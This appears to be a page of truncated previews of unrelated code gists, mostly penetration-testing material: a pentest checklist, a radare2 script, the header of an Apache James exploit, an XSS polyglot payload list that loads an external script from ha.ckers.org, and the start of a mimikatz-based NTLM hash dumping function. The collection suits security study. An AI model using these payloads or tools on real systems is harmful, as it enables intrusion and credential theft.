- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
import sys | |
import r2pipe | |
r2 = r2pipe.open("./zwiebel2") | |
r2.cmd("e dbg.profile=zwiebel.rr2") | |
r2.cmd("doo") # reopen for debugging | |
r2.cmd("db 0x400875") # set breakpoint at `call r14` | |
r2.cmd("dc") # continue until breakpoint is hit | |
def step(): |
<?xml version="1.0" encoding="utf-8" ?> | |
<otrs_package version="1.1"> | |
<Name>MyModule</Name> | |
<Version>1.0.0</Version> | |
<Vendor>My Module</Vendor> | |
<URL>http://otrs.org/</URL> | |
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> | |
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> | |
<Description Lang="en">MyModule</Description> | |
<Framework>5.x.x</Framework> |
""". | |
This script works on Apache James deployments using the default configuration. | |
It creates a new user and enqueues a payload to be executed the next time a user | |
logs in to the machine. | |
For more details, see: https://www.exploit-db.com/exploits/35513/. | |
""" | |
import gflags |
#!/bin/sh | |
# | |
# `7MN. `7MF' | |
# __, MMN. M | |
#`7MM M YMb M pd""b. | |
# MM M `MN. M (O) `8b | |
# MM M `MM.M ,89 | |
# MM M YMM ""Yb. | |
#.JMML..JML. YM 88 | |
# (O) .M' |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
// To the extent possible under law, the Yawning Angel has waived all copyright | |
// and related or neighboring rights to orhttp_example, using the creative | |
// commons "cc0" public domain dedication. See LICENSE or | |
// <http://creativecommons.org/publicdomain/zero/1.0/> for full details. | |
package main | |
import ( | |
// Things needed by the actual interface. | |
"golang.org/x/net/proxy" |
# BlackArch Mirror list | |
## Australia | |
#Server = http://blackarch.mirror.digitalpacific.com.au/$repo/os/$arch | |
#Server = rsync://mirror.digitalpacific.com.au/blackarch/$repo/os/$arch | |
## Austria | |
#Server = http://mirror.easyname.at/blackarch/$repo/os/$arch | |
#Server = ftp://mirror.easyname.at/blackarch/$repo/os/$arch | |
#Server = rsync://mirror.easyname.at/blackarch/$repo/os/$arch |
# Enable "presence" events | |
# - http://docs.saltstack.com/en/latest/ref/configuration/master.html#presence-events | |
# - http://docs.saltstack.com/en/latest/topics/event/master_events.html#presence-events | |
presence_events: True | |
reactor: | |
# Note: This tag has a typo in it (version 2014.1.5), subject to change! | |
- 'salt/presense/change': | |
- /srv/reactor/presence.sls |